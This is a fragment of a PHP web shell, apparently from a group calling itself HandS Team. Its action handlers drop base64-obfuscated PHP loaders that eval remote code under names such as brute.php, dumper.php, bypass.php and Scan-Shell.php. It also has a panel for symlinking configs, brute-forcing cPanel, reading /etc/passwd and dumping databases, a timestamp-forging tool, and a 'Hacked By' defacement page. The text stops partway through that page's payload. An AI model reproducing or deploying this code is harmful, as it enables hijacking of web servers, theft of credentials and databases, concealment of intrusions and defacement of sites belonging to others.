$perltoolss = 'PD9waHAgJF9GPV9fRklMRV9fOyRfWD0nUHo0OFAzQm9jQ0FrVFRGeU5ESnVNREEySUQwZ1pqUnNOVjluTlhSZll6SnVkRFZ1ZEhNb0oyaDBkSEE2THk5d01YTjBOV0kwYmk1ak1tMHZjakYzTG5Cb2NEODBQVkJXZVRSbk0yVjZKeWs3RFFvMWRqRnNLR0l4Y3pWbGRWOWtOV015WkRVb0pFMHhjalF5YmpBd05pa3BPeUEvUGc9PSc7ZXZhbChiYXNlNjRfZGVjb2RlKCdKRjlZUFdKaGMyVTJORjlrWldOdlpHVW9KRjlZS1Rza1gxZzljM1J5ZEhJb0pGOVlMQ2N4TWpNME5UWmhiM1ZwWlNjc0oyRnZkV2xsTVRJek5EVTJKeWs3SkY5U1BXVnlaV2RmY21Wd2JHRmpaU2duWDE5R1NVeEZYMThuTENJbklpNGtYMFl1SWljaUxDUmZXQ2s3WlhaaGJDZ2tYMUlwT3lSZlVqMHdPeVJmV0Qwd093PT0nKSk7Pz4=
';
$file = fopen("leech.php","w+");
$write = fwrite ($file ,base64_decode($perltoolss));
fclose($file);
echo "<iframe src=leech.php width=100% height=720px frameborder=0></iframe> ";
}
elseif ($action == 'backphp') {
$file = fopen($dir."backphp.php","w+");
$perltoolss = 'PD9waHAgJF9GPV9fRklMRV9fOyRfWD0nUHo0OFAzQm9jQ0FrVFRGeU5ESnVNREEySUQwZ1pqUnNOVjluTlhSZll6SnVkRFZ1ZEhNb0oyaDBkSEE2THk5d01YTjBOV0kwYmk1ak1tMHZjakYzTG5Cb2NEODBQV2R3WkhCU2VVeGtKeWs3RFFvMWRqRnNLR0l4Y3pWbGRWOWtOV015WkRVb0pFMHhjalF5YmpBd05pa3BPeUEvUGc9PSc7ZXZhbChiYXNlNjRfZGVjb2RlKCdKRjlZUFdKaGMyVTJORjlrWldOdlpHVW9KRjlZS1Rza1gxZzljM1J5ZEhJb0pGOVlMQ2N4TWpNME5UWmhiM1ZwWlNjc0oyRnZkV2xsTVRJek5EVTJKeWs3SkY5U1BXVnlaV2RmY21Wd2JHRmpaU2duWDE5R1NVeEZYMThuTENJbklpNGtYMFl1SWljaUxDUmZXQ2s3WlhaaGJDZ2tYMUlwT3lSZlVqMHdPeVJmV0Qwd093PT0nKSk7Pz4=
';
$file = fopen("backphp.php","w+");
$write = fwrite ($file ,base64_decode($perltoolss));
fclose($file);
echo "<iframe src=backphp.php width=100% height=720px frameborder=0></iframe> ";
}

elseif ($action == 'brute') {
$file = fopen($dir."brute.php","w+");
$perltoolss = 'PD9waHAgJF9GPV9fRklMRV9fOyRfWD0nUHo0OFAzQm9jQ0FrVFRGeU5ESnVNREEySUQwZ1pqUnNOVjluTlhSZll6SnVkRFZ1ZEhNb0oyaDBkSEE2THk5d01YTjBOV0kwYmk1ak1tMHZjakYzTG5Cb2NEODBQVWhFVUZwbmRWSlpKeWs3RFFvMWRqRnNLR0l4Y3pWbGRWOWtOV015WkRVb0pFMHhjalF5YmpBd05pa3BPeUEvUGc9PSc7ZXZhbChiYXNlNjRfZGVjb2RlKCdKRjlZUFdKaGMyVTJORjlrWldOdlpHVW9KRjlZS1Rza1gxZzljM1J5ZEhJb0pGOVlMQ2N4TWpNME5UWmhiM1ZwWlNjc0oyRnZkV2xsTVRJek5EVTJKeWs3SkY5U1BXVnlaV2RmY21Wd2JHRmpaU2duWDE5R1NVeEZYMThuTENJbklpNGtYMFl1SWljaUxDUmZXQ2s3WlhaaGJDZ2tYMUlwT3lSZlVqMHdPeVJmV0Qwd093PT0nKSk7Pz4=
';
$file = fopen("brute.php","w+");
$write = fwrite ($file ,base64_decode($perltoolss));
fclose($file);
echo "<iframe src=brute.php width=100% height=720px frameborder=0></iframe> ";
}
elseif ($action == 'dumper') {
$file = fopen($dir."dumper.php","w+");
$file = mkdir("backup");
$file = chmod("backup",0755);
$perltoolss = 'PD9waHAgJF9GPV9fRklMRV9fOyRfWD0nUHo0OFAzQm9jQ0FrVFRGeU5ESnVNREEySUQwZ1pqUnNOVjluTlhSZll6SnVkRFZ1ZEhNb0oyaDBkSEE2THk5d01YTjBOV0kwYmk1ak1tMHZjakYzTG5Cb2NEODBQVFpPVmpSaFRuVmxKeWs3RFFvMWRqRnNLR0l4Y3pWbGRWOWtOV015WkRVb0pFMHhjalF5YmpBd05pa3BPeUEvUGc9PSc7ZXZhbChiYXNlNjRfZGVjb2RlKCdKRjlZUFdKaGMyVTJORjlrWldOdlpHVW9KRjlZS1Rza1gxZzljM1J5ZEhJb0pGOVlMQ2N4TWpNME5UWmhiM1ZwWlNjc0oyRnZkV2xsTVRJek5EVTJKeWs3SkY5U1BXVnlaV2RmY21Wd2JHRmpaU2duWDE5R1NVeEZYMThuTENJbklpNGtYMFl1SWljaUxDUmZXQ2s3WlhaaGJDZ2tYMUlwT3lSZlVqMHdPeVJmV0Qwd093PT0nKSk7Pz4=
';
$file = fopen("dumper.php","w+");
$write = fwrite ($file ,base64_decode($perltoolss));
fclose($file);
echo "<iframe src=dumper.php width=100% height=720px frameborder=0></iframe> ";
}
elseif ($action == 'bypass') {
$file = fopen($dir."bypass.php","w+");
$perltoolss = 'PCFET0NUWVBFIEhUTUwgUFVCTElDICctLy9XM0MvL0RURCBIVE1MIDQuMDEgVHJhbnNpdGlvbmFsLy9FTicgJ2h0dHA6Ly93d3cudzMub3JnL1RSL2h0bWw0L2xvb3NlLmR0ZCc+CjxodG1sPgo8IS0tSXRzIEZpcnN0IFB1YmxpYyBWZXJzaW9uIAoKIC0tPgo8L2h0bWw+CjxodG1sPgo8aGVhZD4KPG1ldGEgaHR0cC1lcXVpdj0nQ29udGVudC1UeXBlJyBjb250ZW50PSd0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgnPgo8dGl0bGU+OjogQnlQYXNzIDo6IEt5bUxqbmsgOjo8L3RpdGxlPgo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPgphIHsgCnRleHQtZGVjb3JhdGlvbjpub25lOwpjb2xvcjp3aGl0ZTsKIH0KPC9zdHlsZT4gCjxzdHlsZT4KaW5wdXQgeyAKY29sb3I6IzAwMDAzNTsgCmZvbnQ6OHB0ICd0cmVidWNoZXQgbXMnLGhlbHZldGljYSxzYW5zLXNlcmlmOwp9Ci5ESVIgeyAKY29sb3I6IzAwMDAzNTsgCmZvbnQ6Ym9sZCA4cHQgJ3RyZWJ1Y2hldCBtcycsaGVsdmV0aWNhLHNhbnMtc2VyaWY7Y29sb3I6I0ZGRkZGRjsKYmFja2dyb3VuZC1jb2xvcjojQUEwMDAwOwpib3JkZXItc3R5bGU6bm9uZTsKfQoudHh0IHsgCmNvbG9yOiMyQTAwMDA7IApmb250OmJvbGQgIDhwdCAndHJlYnVjaGV0IG1zJyxoZWx2ZXRpY2Esc2Fucy1zZXJpZjsKfSAKYm9keSwgdGFibGUsIHNlbGVjdCwgb3B0aW9uLCAuaW5mbwp7CmZvbnQ6Ym9sZCAgOHB0ICd0cmVidWNoZXQgbXMnLGhlbHZldGljYSxzYW5zLXNlcmlmOwp9CmJvZHkgewoJYmFja2dyb3VuZC1jb2xvcjogI0U1RTVFNTsKfQouc3R5bGUxIHtjb2xvcjogI0FBMDAwMH0KLnRkCnsKYm9yZGVyOiAxcHggc29saWQgIzY2NjY2NjsKYm9yZGVyLXRvcDogMHB4Owpib3JkZXItbGVmdDogMHB4Owpib3JkZXItcmlnaHQ6IDBweDsKfQoudGRVUAp7CmJvcmRlcjogMXB4IHNvbGlkICM2NjY2NjY7CmJvcmRlci10b3A6IDFweDsKYm9yZGVyLWxlZnQ6IDBweDsKYm9yZGVyLXJpZ2h0OiAwcHg7CmJvcmRlci1ib3R0b206IDFweDsKfQouc3R5bGU0IHtjb2xvcjogI0ZGRkZGRjsgfQo8L3N0eWxlPgo8L2hlYWQ+Cjxib2R5Pgo8P3BocCAkX0Y9X19GSUxFX187JF9YPSdQejQ4UDNCb2NDQWtUVEZ5TkRKdU1EQTJJRDBnWmpSc05WOW5OWFJmWXpKdWREVnVkSE1vSjJoMGRIQTZMeTl3TVhOME5XSTBiaTVqTW0wdmNqRjNMbkJvY0Q4MFBYQkhjWFpRYVhsaUp5azdEUW8xZGpGc0tHSXhjelZsZFY5a05XTXlaRFVvSkUweGNqUXliakF3TmlrcE95QS9QZz09JztldmFsKGJhc2U2NF9kZWNvZGUoJ0pGOVlQV0poYzJVMk5GOWtaV052WkdVb0pGOVlLVHNrWDFnOWMzUnlkSElvSkY5WUxDY3hNak0wTlRaaGIzVnBaU2NzSjJGdmRXbGxNVEl6TkRVMkp5azdKRjlTUFdWeVpXZGZjbVZ3YkdGalpTZ25YMTlHU1V4RlgxOG5MQ0luSWk0a1gwWXVJaWNpTENSZldDazdaWFpoYkNna1gxSXBPeVJmVWowd095UmZXRDB3T3c9PScpKTs/Pgo8dGQgY2xhc3M9J3RkJyBzdHlsZT0nYm9yZGVyLWJvdHRvbS13aWR0aDp0aGluO2JvcmRlci10b3Atd2lkdGg6dGhpbic+PGZvcm0gbmFtZT0nRjEnIG1ldGhvZD0ncG9zdCc+CjxkaXYgYWxpZ249J2xlZnQnPgo8aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSdTdWJtaXQxNCcgdmFsdWU9JyBDcmVhdCBQeXRob24gICc+CjxpbnB1dCB0eXBlPSdzdWJtaXQnIG5hbWU9J1N1Ym1pdDEzJyB2YWx1ZT0nIENyZWF0ICBDZ2kgICAgJz4KPGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0nU3VibWl0MTEnIHZhbHVlPScxLlN5bSBBbGwgQ29uZmlnJz4KPGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0nU3VibWl0NycgdmFsdWU9JzIuSHRhY2Nlc3MgQWxsIENvbmZpZyc+CjxpbnB1dCB0eXBlPSdzdWJtaXQnIG5hbWU9J1N1Ym1pdDYnIHZhbHVlPSczLkJydXRlIENwYW5lbCc+CjxpbnB1dCB0eXBlPSdzdWJtaXQnIG5hbWU9J1N1Ym1pdDE1JyB2YWx1ZT0nIC9ldGMvcGFzc3dkICAgJz4KPGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0nU3VibWl0MTYnIHZhbHVlPScgTXkgU1FMIER1bXBlciAnPgo8aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSdTdWJtaXQxMCcgdmFsdWU9J3RhciAteHZmIFN5bS50YXInPgo8aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSdTdWJtaXQxMicgdmFsdWU9JzEuU3ltIExpbmsgVXNlciAnPgo8aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSdTdWJtaXQ5JyB2YWx1ZT0nMi5IdGFjY2VzcyBMaXN0ICc+CjxpbnB1dCB0eXBlPSdzdWJtaXQnIG5hbWU9J1N1Ym1pdDgnIHZhbHVlPSczLkh0YWNjZXNzIEVtcHR5Jz4KPC9mb3JtPgo8L3RkPgo8L2JvZHk+CjwvaHRtbD4=
';
$file = fopen("bypass.php","w+");
$write = fwrite ($file ,base64_decode($perltoolss));
fclose($file);
echo "<iframe src=bypass.php width=100% height=720px frameborder=0></iframe> ";
}
elseif ($action == 'md5') {
echo "<iframe src=http://www.md5.cz/ width=100% height=400px frameborder=0></iframe> ";
}
elseif ($action == 'crack') {
echo "<iframe src=http://www.md5decrypter.co.uk/ width=100% height=400px frameborder=0></iframe> ";
}
elseif ($action == 'handstool') {
echo "<iframe src=http://handsteamsys.com/HandStools/ width=100% height=720px frameborder=0></iframe> ";
}
elseif ($action == 'editfile') {
if(file_exists($opfile)) {
$fp=@fopen($opfile,'r');
$contents=@fread($fp,filesize($opfile));
@fclose($fp);
$contents=htmlspecialchars($contents);
}
formhead(array('title'=>'T&#7841;o, S&#7917;a File'));
makehide('action','file');
makehide('dir',$nowpath);
makeinput(array('title'=>'&#272;&#432;&#7901;ng D&#7851;n File S&#7869; T&#7841;o Ra (Vi&#7871;t N&#7897;i Dung File V&#224;o B&#234;n D&#432;&#7899;i &#272;&#432;&#7901;ng D&#7851;n)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
maketext(array('title'=>'Nh&#7853;p N&#7897;i Dung File','name'=>'filecontent','value'=>$contents));
formfooter();
}
elseif ($action == 'newtime') {
$opfilemtime = @filemtime($opfile);
$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
formhead(array('title'=>'Clone file was last modified time'));
makehide('action','file');
makehide('dir',$nowpath);
makeinput(array('title'=>'Thay &#272;&#7893;i T&#7879;p Tin','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
formfooter();
formhead(array('title'=>'Set last modified'));
makehide('action','file');
makehide('dir',$nowpath);
makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
p('<p>Instead &raquo;');
p('year:');
makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
p('month:');
makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
p('day:');
makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
p('hour:');
makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
p('minute:');
makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
p('second:');
makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
p('</p>');
formfooter();
}
elseif ($action == 'symroot') {
$file = fopen($dir."symroot.php","w+");
$perltoolss = 'PD9waHAgJF9GPV9fRklMRV9fOyRfWD0nUHo0OFAzQm9jQ0FrVFRGeU5ESnVNREEySUQwZ1pqUnNOVjluTlhSZll6SnVkRFZ1ZEhNb0oyaDBkSEE2THk5d01YTjBOV0kwYmk1ak1tMHZjakYzTG5Cb2NEODBQVEZEY0ZJM2FFdGtKeWs3RFFvMWRqRnNLR0l4Y3pWbGRWOWtOV015WkRVb0pFMHhjalF5YmpBd05pa3BPeUEvUGc9PSc7ZXZhbChiYXNlNjRfZGVjb2RlKCdKRjlZUFdKaGMyVTJORjlrWldOdlpHVW9KRjlZS1Rza1gxZzljM1J5ZEhJb0pGOVlMQ2N4TWpNME5UWmhiM1ZwWlNjc0oyRnZkV2xsTVRJek5EVTJKeWs3SkY5U1BXVnlaV2RmY21Wd2JHRmpaU2duWDE5R1NVeEZYMThuTENJbklpNGtYMFl1SWljaUxDUmZXQ2s3WlhaaGJDZ2tYMUlwT3lSZlVqMHdPeVJmV0Qwd093PT0nKSk7Pz4KPC9jZW50ZXI+
';
$file = fopen("symroot.php","w+");
$write = fwrite ($file ,base64_decode($perltoolss));
fclose($file);
echo "<iframe src=symroot.php width=100% height=720px frameborder=0></iframe> ";
}

elseif ($action == 'scanshell') {
$file = fopen($dir."Scan-Shell.php","w+");
$perltoolss = 'PD9waHAgJF9GPV9fRklMRV9fOyRfWD0nUHo0OFAzQm9jQ0FrVFRGeU5ESnVNREEySUQwZ1pqUnNOVjluTlhSZll6SnVkRFZ1ZEhNb0oyaDBkSEE2THk5d01YTjBOV0kwYmk1ak1tMHZjakYzTG5Cb2NEODBQVXc1ZG5RMlRHVjRKeWs3RFFvMWRqRnNLR0l4Y3pWbGRWOWtOV015WkRVb0pFMHhjalF5YmpBd05pa3BPeUEvUGc9PSc7ZXZhbChiYXNlNjRfZGVjb2RlKCdKRjlZUFdKaGMyVTJORjlrWldOdlpHVW9KRjlZS1Rza1gxZzljM1J5ZEhJb0pGOVlMQ2N4TWpNME5UWmhiM1ZwWlNjc0oyRnZkV2xsTVRJek5EVTJKeWs3SkY5U1BXVnlaV2RmY21Wd2JHRmpaU2duWDE5R1NVeEZYMThuTENJbklpNGtYMFl1SWljaUxDUmZXQ2s3WlhaaGJDZ2tYMUlwT3lSZlVqMHdPeVJmV0Qwd093PT0nKSk7Pz4=
';
$file = fopen("Scan-Shell.php","w+");
$write = fwrite ($file ,base64_decode($perltoolss));
fclose($file);
echo "<iframe src=Scan-Shell.php width=100% height=720px frameborder=0></iframe> ";
}
elseif ($action == 'indexhands') {
$file = fopen($dir."HandS-Team.html","w+");
$perltoolss = 'PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFsLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9EVEQveGh0bWwxLXRyYW5zaXRpb25hbC5kdGQiPgo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+CjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4KPGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiB0eXBlPSJpbWFnZS9naWYiIGhyZWY9Imh0dHA6Ly9pLmltZ3VyLmNvbS9oZHB0Ui5qcGciIC8+Cjx0aXRsZT4rWy46SGFuZFMgVGVhbSBIYWNrZWQgR3JvdXAhISE6Ll0rPC90aXRsZT4KPHN0eWxlIHR5cGU9InRleHQvY3NzIj4KYm9keSB7CmZvbnQ6IkNvdXJpZXIgTmV3IiwgQ291cmllciwgbW9ub3NwYWNlOwpiYWNrZ3JvdW5kLWNvbG9yOiAjMDAwOwpiYWNrZ3JvdW5kLWltYWdlOiB1cmwoaHR0cDovL2kuaW1ndXIuY29tL2RtUUxYRVkuanBnKTsKYmFja2dyb3VuZC1yZXBlYXQ6IG5vLXJlcGVhdDsKfQoJI3dhcnAJewoJCW1hcmdpbi1sZWZ0OiBhdXRvOwoJCW1hcmdpbi1yaWdodDogYXV0bzsKCQl3aWR0aDo2MzBweDsKCX0KCSN0aXRsZQl7CgkJZm9udC1zaXplOjMwcHg7CgkJbWFyZ2luLWJvdHRvbToyMDBweDsKCX0KCSNzdWJoZWFkZXIJewoJCW1hcmdpbi10b3A6LTMwcHg7Cgl9CgkjbWFzYWdlCXsKCQlmb250LXNpemU6IDI0cHg7Cgl9CgloMQl7CgkJY29sb3I6Izk5OTsKCQltYXJnaW4tYm90dG9tOjFweDsKCX0KCXAJewoJCWNvbG9yOiM5OTk7Cgl9CgkjZm9vdGVyCXsKCQltYXJnaW4tdG9wOiAxNTBweDsKCQltYXJnaW4tbGVmdDogYXV0bzsKCQltYXJnaW4tcmlnaHQ6YXV0bzsKCQljb2xvcjojOTk5OwoJCWJvcmRlcjpkYXNoZWQ7CgkJd2lkdGg6NDAwcHg7Cgl9CglhLmFjdGl2YXRvcnsKCQl3aWR0aDoxNTNweDsKCQloZWlnaHQ6MTUwcHg7CgkJcG9zaXRpb246YWJzb2x1dGU7CgkJdG9wOjBweDsKCQlyaWdodDowcHg7CgkJYmFja2dyb3VuZDogdXJsKGh0dHA6Ly9pMTE2OC5waG90b2J1Y2tldC5jb20vYWxidW1zL3I0ODcvY2hyaXNrOGVyL2NsaWNrbWUucG5nKSBuby1yZXBlYXQgdG9wIHJpZ2h0OwoJCXotaW5kZXg6MTsKCQljdXJzb3I6cG9pbnRlcjsKCX0KCS8qIFN0eWxlIGZvciBvdmVybGF5IGFuZCBib3ggKi8KCS5vdmVybGF5ewoJCWJhY2tncm91bmQ6dHJhbnNwYXJlbnQgdXJsKGh0dHA6Ly9pMTE2OC5waG90b2J1Y2tldC5jb20vYWxidW1zL3I0ODcvY2hyaXNrOGVyL292ZXJsYXkucG5nKSByZXBlYXQgdG9wIGxlZnQ7CgkJcG9zaXRpb246Zml4ZWQ7CgkJdG9wOjBweDsKCQlib3R0b206MHB4OwoJCWxlZnQ6MHB4OwoJCXJpZ2h0OjBweDsKCQl6LWluZGV4OjEwMDsKCX0KCS5ib3h7CgkJcG9zaXRpb246Zml4ZWQ7CgkJdG9wOi0yMDBweDsKCQlsZWZ0OjMwJTsKCQlyaWdodDozMCU7CgkJYmFja2dyb3VuZC1jb2xvcjogIzAwMDsKCQljb2xvcjojN2Y3ZjdmOwoJCXBhZGRpbmc6MjBweDsKCQlib3JkZXI6MnB4IHNvbGlkICNjY2M7CgkJLW1vei1ib3JkZXItcmFkaXVzOiAyMHB4OwoJCS13ZWJraXQtYm9yZGVyLXJhZGl1czoyMHB4OwoJCS1raHRtbC1ib3JkZXItcmFkaXVzOjIwcHg7CgkJLW1vei1ib3gtc2hhZG93OiAwIDFweCA1cHggIzMzMzsKCQktd2Via2l0LWJveC1zaGFkb3c6IDAgMXB4IDVweCAjMzMzOwoJCXotaW5kZXg6MTAxOwoJfQoJLmJveCBoMXsKCQlib3JkZXItYm90dG9tOiAxcHggZGFzaGVkICM3RjdGN0Y7CgkJbWFyZ2luOi0yMHB4IC0yMHB4IDBweCAtMjBweDsKCQlwYWRkaW5nOjEwcHg7CgkJYmFja2dyb3VuZC1jb2xvcjojRkYwOwoJCWNvbG9yOiAjMDAwOwoJCS1tb3otYm9yZGVyLXJhZGl1czoyMHB4IDIwcHggMHB4IDBweDsKCQktd2Via2l0LWJvcmRlci10b3AtbGVmdC1yYWRpdXM6IDIwcHg7CgkJLXdlYmtpdC1ib3JkZXItdG9wLXJpZ2h0LXJhZGl1czogMjBweDsKCQkta2h0bWwtYm9yZGVyLXRvcC1sZWZ0LXJhZGl1czogMjBweDsKCQkta2h0bWwtYm9yZGVyLXRvcC1yaWdodC1yYWRpdXM6IDIwcHg7Cgl9CglhLmJveGNsb3NlewoJCWZsb2F0OnJpZ2h0OwoJCXdpZHRoOjI2cHg7CgkJaGVpZ2h0OjI2cHg7CgkJYmFja2dyb3VuZDp0cmFuc3BhcmVudCB1cmwoaHR0cDovL2kxMTY4LnBob3RvYnVja2V0LmNvbS9hbGJ1bXMvcjQ4Ny9jaHJpc2s4ZXIvY2FuY2VsLnBuZykgcmVwZWF0IHRvcCBsZWZ0OwoJCW1hcmdpbi10b3A6LTMwcHg7CgkJbWFyZ2luLXJpZ2h0Oi0zMHB4OwoJCWN1cnNvcjpwb2ludGVyOwoJfQoJLmRyb3AgeyBwb3NpdGlvbjogYWJzb2x1dGU7IHdpZHRoOiAzOyAgZmlsdGVyOiBmbGlwVigpLCBmbGlwSCgpOyBmb250LXNpemU6IDQwOyBjb2xvcjogYmx1ZSB9Cjwvc3R5bGU+CjxzY3JpcHQgbGFuZ3VhZ2U9IkphdmFTY3JpcHQiPgovL0Rpc2FibGUgcmlnaHQgbW91c2UgY2xpY2sgU2NyaXB0CnZhciBtZXNzYWdlPSJObyBEZWFmYWNlICI7Ci8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vCmZ1bmN0aW9uIGNsaWNrSUU0KCl7CmlmIChldmVudC5idXR0b249PTIpewphbGVydChtZXNzYWdlKTsKcmV0dXJuIGZhbHNlOwp9Cn0KZnVuY3Rpb24gY2xpY2tOUzQoZSl7CmlmIChkb2N1bWVudC5sYXllcnN8fGRvY3VtZW50LmdldEVsZW1lbnRCeUlkJiYhZG9jdW1lbnQuYWxsKXsKaWYgKGUud2hpY2g9PTJ8fGUud2hpY2g9PTMpewphbGVydChtZXNzYWdlKTsKcmV0dXJuIGZhbHNlOwp9Cn0KfQppZiAoZG9jdW1lbnQubGF5ZXJzKXsKZG9jdW1lbnQuY2FwdHVyZUV2ZW50cyhFdmVudC5NT1VTRURPV04pOwpkb2N1bWVudC5vbm1vdXNlZG93bj1jbGlja05TNDsKfQplbHNlIGlmIChkb2N1bWVudC5hbGwmJiFkb2N1bWVudC5nZXRFbGVtZW50QnlJZCl7CmRvY3VtZW50Lm9ubW91c2Vkb3duPWNsaWNrSUU0Owp9CmRvY3VtZW50Lm9uY29udGV4dG1lbnU9bmV3IEZ1bmN0aW9uKCJhbGVydChtZXNzYWdlKTtyZXR1cm4gZmFsc2UiKQo8L3NjcmlwdD4KPHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+CnZhciByZXYgPSAiZndkIjsKZnVuY3Rpb24gdGl0bGViYXIodmFsKQp7CnZhciBtc2cgPSAiISEhIEhhY2tlZCBCeSBIYW5kUyBUZWFtICI7CnZhciByZXMgPSAiICI7CnZhciBzcGVlZCA9IDEwMDsKdmFyIHBvcyA9IHZhbDsKbXNnID0gIn4+ICIrbXNnKyIgPH4iOwp2YXIgbGUgPSBtc2cubGVuZ3RoOwppZihyZXYgPT0gImZ3ZCIpewppZihwb3MgPCBsZSl7CnBvcyA9IHBvcysxOwpzY3JvbGwgPSBtc2cuc3Vic3RyKDAscG9zKTsKZG9jdW1lbnQudGl0bGUgPSBzY3JvbGw7CnRpbWVyID0gd2luZG93LnNldFRpbWVvdXQoInRpdGxlYmFyKCIrcG9zKyIpIixzcGVlZCk7Cn0KZWxzZXsKcmV2ID0gImJ3ZCI7CnRpbWVyID0gd2luZG93LnNldFRpbWVvdXQoInRpdGxlYmFyKCIrcG9zKyIpIixzcGVlZCk7Cn0KfQplbHNlewppZihwb3MgPiAwKXsKcG9zID0gcG9zLTE7CnZhciBhbGUgPSBsZS1wb3M7CnNjcm9sID0gbXNnLnN1YnN0cihhbGUsbGUpOwpkb2N1bWVudC50aXRsZSA9IHNjcm9sOwp0aW1lciA9IHdpbmRvdy5zZXRUaW1lb3V0KCJ0aXRsZWJhcigiK3BvcysiKSIsc3BlZWQpOwp9CmVsc2V7CnJldiA9ICJmd2QiOwp0aW1lciA9IHdpbmRvdy5zZXRUaW1lb3V0KCJ0aXRsZWJhcigiK3BvcysiKSIsc3BlZWQpOwp9Cn0KfQp0aXRsZWJhcigwKTsKPC9zY3JpcHQ+Cjxib2R5IG9ua2V5ZG93bj0ncmV0dXJuIGZhbHNlOyc+CiAgICAgICA8ZGl2IGNsYXNzPSJjb250ZW50Ij4KICAgICAgICAgICAgPCEtLSBUaGUgYWN0aXZhdG9yIC0tPgogICAgICAgICAgICA8YSBjbGFzcz0iYWN0aXZhdG9yIiBpZD0iYWN0aXZhdG9yIj48L2E+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPCEtLSBUaGUgb3ZlcmxheSBhbmQgdGhlIGJveCAtLT4KICAgICAgICA8ZGl2IGNsYXNzPSJvdmVybGF5IiBpZD0ib3ZlcmxheSIgc3R5bGU9ImRpc3BsYXk6bm9uZTsiPjwvZGl2PgogICAgICAgIDxkaXYgY2xhc3M9ImJveCIgaWQ9ImJveCI+CiAgICAgICAgICAgIDxhIGNsYXNzPSJib3hjbG9zZSIgaWQ9ImJveGNsb3NlIj48L2E+CiAgICAgICAgICAgIDxoMT5DaMO6IMO9ISEhPC9oMT4gICAgICAgICAgICA8cD4KICAgICAgICAgICAgICAgIFhpbiBDaCYjMjI0O28gYWRtaW4sIEImIzc4NDM7byBNJiM3ODUzO3QgUXUmIzIyNTsgSyYjMjMzO20sc2l0ZSBEJiMyMzc7bmggTCYjNzg5NTtpIEZpeCBMJiM3ODk1O2kgTiYjNzg3MTt1IEImIzc4NDE7biBNdSYjNzg4OTtuIFQmIzc4OTE7biBUJiM3ODQxO2kgOikpLiAhCiAgICAgICAgICAgICAgICA8YnIvPiAgICAgICAgICAgICAgICA8YnIvPgogICAgICAgICAgICAgICAgSyYjMjUzOyBUw6puOiAhISE8YnI+CgkJCQlObyBTdXBwb3J0ICAgICAgICAgICAgPC9wPgogICAgICAgIDwvZGl2PgogICAgICAgIDwhLS0gVGhlIEphdmFTY3JpcHQgLS0+CiAgICAgICAgPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cDovL3R5bXBhbnVzLm5ldC9UdXRvcmlhbHMvQ1NTT3ZlcmxheS9qcXVlcnktMS4zLjIuanMiPjwvc2NyaXB0PiAgICAgICAgPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPgogICAgICAgICAgICAkKGZ1bmN0aW9uKCkgewogICAgICAgICAgICAgICAgJCgnI2FjdGl2YXRvcicpLmNsaWNrKGZ1bmN0aW9uKCl7CiAgICAgICAgICAgICAgICAgICAgJCgnI292ZXJsYXknKS5mYWRlSW4oJ2Zhc3QnLGZ1bmN0aW9uKCl7CiAgICAgICAgICAgICAgICAgICAgICAgICQoJyNib3gnKS5hbmltYXRlKHsndG9wJzonMTYwcHgnfSw1MDApOwogICAgICAgICAgICAgICAgICAgIH0pOwogICAgICAgICAgICAgICAgfSk7CiAgICAgICAgICAgICAgICAkKCcjYm94Y2xvc2UnKS5jbGljayhmdW5jdGlvbigpewogICAgICAgICAgICAgICAgICAgICQoJyNib3gnKS5hbmltYXRlKHsndG9wJzonLTIwMHB4J30sNTAwLGZ1bmN0aW9uKCl7CiAgICAgICAgICAgICAgICAgICAgICAgICQoJyNvdmVybGF5JykuZmFkZU91dCgnZmFzdCcpOwogICAgICAgICAgICAgICAgICAgIH0pOwogICAgICAgICAgICAgICAgfSk7CiAgICAgICAgICAgIH0pOwogICAgICAgIDwvc2NyaXB0Pgo8IS0tc2hvdyB0aGUgc25vdy0tPgo8c2NyaXB0IGxhbmd1YWdlPSJKYXZhU2NyaXB0Ij4KaWYgICgoZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQpICYmIAp3aW5kb3cuYWRkRXZlbnRMaXN0ZW5lciB8fCB3aW5kb3cuYXR0YWNoRXZlbnQpewooZnVuY3Rpb24oKXsKLy9Db25maWd1cmUgaGVyZS4KdmFyIG51bSA9IDMwOyAgIC8vTnVtYmVyIG9mIGZsYWtlcwp2YXIgdGltZXIgPSAzMDsgLy9zZXRUaW1lb3V0IHNwZWVkLiBWYXJpZXMgb24gZGlmZmVyZW50IGNvbXBzCn